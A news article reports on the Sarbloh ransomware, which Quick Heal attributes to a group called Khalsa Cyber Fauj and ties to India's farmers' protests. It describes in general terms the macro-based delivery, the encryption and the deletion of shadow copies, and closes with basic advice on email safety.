Farmers’ protests activists are reportedly using a ransomware-style cyber attack in a bid to raise more voices towards the cause of the protesting farmers in India. In light of the ongoing farmer protests against the newly instated Farm Bills 2020, Quick Heal, an Indian cyber security organisation, has claimed to have found proof of a cyber attack campaign by a group seemingly called ‘Khalsa Cyber Fauj’. Through this attack, the group of activists are said to be spreading a ransomware file that encrypts a computer when downloaded with the infection, but does not particularly demand a conventional ransom.
Instead, as Tejaswini Sandapolla, a security researcher at Quick Heal writes, the ransomware states that the ransomware encryption will not be removed until the demands of the protesting farmers have been met. A blog post on the ransomware details that the attack is using typical Microsoft Office documents to hide the ransomware code within macro elements in the doc files. Once this document is downloaded to a PC by a user, it then enables the macro element to execute a command, which downloads the actual malware file from a remote server. The ransomware is called Sarbloh, after the file extension that it carries.
The Khalsa Cyber Fauj’s Sarbloh ransomware cannot be decrypted because it uses both a dynamically generated AES encryption key, and has a proprietary RSA Public key, which is stored within the document itself. In essence, the Sarbloh ransomware being used by the claimed farmers’ protests activists is a very typical one in terms of malware available on the internet today. It uses a known format of downloading on to one’s PCs, and subsequently being enabled to encrypt all files on a device.
However, it is not known yet if the Sarbloh ransomware is being spread using typical phishing emails or through other channels as well. It is also unclear whether the ransomware has any known weaknesses, and Quick Heal has further claimed that it also has a command to delete shadow copies of files stored in a system. This may make it next to impossible for users to recover their files, if their PCs are infected by the ransomware. It is also unclear if the Khalsa Cyber Fauj is actually aligned with the leaders of the farmers’ protests, or are miscreants who are cashing in on the present socio-political stand-off with separate political motives of their own. No statements have so far been issued by any farmer leader in association with this ransomware.
To stay safe, the one true process is to make sure that you do not download any attachment to any device until you are sure that you are meant to. Only open emails and message content that you can personally verify, in order to make sure that your online safety is not exploited by unknown sources.